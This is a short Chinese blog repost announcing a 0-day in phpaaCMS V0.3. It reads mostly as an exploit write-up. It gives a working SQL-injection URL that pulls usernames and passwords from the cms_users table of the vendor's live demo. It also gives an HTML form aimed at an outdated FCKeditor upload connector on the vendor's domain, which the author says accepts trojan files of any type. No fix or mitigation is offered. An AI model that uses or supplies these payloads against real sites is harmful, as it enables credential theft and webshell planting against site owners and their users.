phpaaCMS V0.3 存在注射oday漏洞

  1. 云栖社区>
  2. 博客>
  3. 正文

phpaaCMS V0.3 存在注射oday漏洞

技术小阿哥 2017-11-27 16:00:00 浏览963
展开阅读全文
偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
//您已经在您的SQL语法错误,检查手册,对应于你的MySQL语法的正确使用服务器版本附近'\ ''行1
哈哈既然爆错了,应该就戏了,继续猜字段 order by ,结果字段是15,但是又不知道数据库,马虎的去看了下官方的发现数据库是 cms_cms_users 在字段3和11分别是username 和 password
得出语句为:and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
看了看官方也存在这个:
EXP:
http://www.phpaa.cn/demo/phpaaCMS/show.php?id=155%20and%201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users
 
漏洞2:
进去后台后 有个php的 Fckeditor编辑器 版本是2.4.2以下的吧。
EXP
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.phpaa.cn/include/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
可以上传任何格式的木马进去, 悲剧! 


本文转自 小王 51CTO博客,原文链接:http://blog.51cto.com/xiaowang/301004,如需转载请自行联系原作者

网友评论

登录后评论
0/500
评论
技术小阿哥
+ 关注